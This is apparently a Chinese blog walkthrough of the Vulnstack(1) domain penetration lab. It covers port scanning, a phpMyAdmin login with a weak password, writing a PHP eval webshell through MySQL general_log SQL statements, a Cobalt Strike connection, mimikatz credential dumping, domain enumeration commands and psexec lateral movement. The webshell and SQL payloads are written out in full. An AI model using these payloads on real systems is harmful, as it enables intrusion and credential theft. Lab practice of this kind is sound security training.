0
点赞
收藏
分享

微信扫一扫

Vulnstack(1)域渗透靶场实战

编程练习生J 2021-09-19 阅读 75

1、外网渗透

1.1

使用nmap扫描目标端口,结果如下:



发现目标开启了3306端口,尝试弱口令爆破。



爆破失败。

1.2

我们直接访问80端口,看到了一个php探针页面。



御剑扫描目录,结果如下:



访问phpmyadmin,弱口令root,root直接登录,尝试利用phpmyadmin来getshell。

1.3

查询绝对路径:

select @@basedir


网站的绝对路径大概率是C:/phpStudy/WWW。
我们直接尝试写入一句话:

select '<?php eval($_POST["xxx"]);?>' into outfile 'C:/phpStudy/WWW/1.php';

发现写入失败,原因是网站没有配置secure_file_priv,secure_file_priv为NULL,表示限制mysql不允许导入导出。没有具体值时,表示不对mysqld 的导入导出做限制。我们使用命令来查看:

show global variables like '%secure%';


接下来我们可以通过写日志的方式进行getshell
Payload:

set global general_log='ON'; 
set global general_log_file='C:/phpStudy/WWW/1.php'; 
SELECT '<?php @eval($_POST[xxx]);?>'

成功执行截图如下:



我们使用蚁剑连接,成功getshell:


2、内网渗透

2.1

利用powershell command上线cs:




whoami看到当前的web服务器处于域(god)中,且为管理员权限。

2.2

systeminfo信息如下:



利用mimiktz得到域管的明文密码:



使用net view查看域内其他主机,这里得到的IP地址有问题,正常应该是192.168.52.x,不过不影响最终我们横向移动。

net user /doamin #查询域内其他用户
net group "domain admins" /domain  #查询所有域管
net group "domain controllers" /domain #查域控

2.3 横向移动,使用psexec



另一台主机同理,最终效果如下:



举报

相关推荐

0 条评论